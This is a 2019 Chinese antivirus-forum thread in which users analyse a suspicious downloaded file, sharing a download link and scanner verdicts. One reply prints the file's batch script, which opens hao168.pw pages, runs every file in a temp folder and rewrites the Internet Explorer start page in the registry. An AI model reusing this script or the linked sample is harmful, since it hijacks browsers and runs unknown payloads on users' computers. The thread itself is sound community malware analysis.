这个是什么文件

显示全部楼层 · 发表于 2019-7-29 16:20:26

以前在微盘下载的都是什么啊没打开

https://www.lanzous.com/i57rc8j

显示全部楼层 · 发表于 2019-7-29 16:21:59

Windows Defender SmartScreen 阻止此下载。

显示全部楼层 · 发表于 2019-7-29 16:25:20

看上去很可疑

显示全部楼层 · 发表于 2019-7-29 16:26:12

显示全部楼层 · 发表于 2019-7-29 18:09:58

Dr.web

显示全部楼层 · 发表于 2019-7-29 18:16:50

本帖最后由暗_黑于 2019-7-29 18:23 编辑

卡巴信任，不过我认为可能是流氓，ps：双击了一下，像是捆绑软件的，然后桌面出现了这个

显示全部楼层 · 发表于 2019-7-29 19:59:10

暗_黑发表于 2019-7-29 18:16
卡巴信任，不过我认为可能是流氓，ps：双击了一下，像是捆绑软件的，然后桌面出现了这个

你看的这是cmd，肯定是信任，这个快捷方式利用cmd运行temp里的病毒，不要被骗了

显示全部楼层 · 发表于 2019-7-29 20:01:52

本帖最后由温馨小屋于 2019-7-29 20:03 编辑

BD 双击miss

就是纯命令行安装。。。
@echo off
start iexplore.exe http://hao168.pw/tj.html?kj-kd_20131101
choice /t 1 /d y /n >nul
start iexplore.exe http://hao168.pw/123.php
for /f "delims=" %%a in ('dir temp\ /s /b /a-d^|findstr /v /i "阅读器.bat"') do (start "" "%%a")
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "http://hao168.pw/123.php" /f >nul 2>nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d "http://hao168.pw/123.php" /f >nul 2>nul
exit

显示全部楼层 · 发表于 2019-7-29 20:10:44

卡巴双击miss

显示全部楼层 · 发表于 2019-7-29 22:14:06

智量报两个PUP一个Adware 。。。火绒不报，看看明天是否入库。

[可疑文件] 这个是什么文件

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块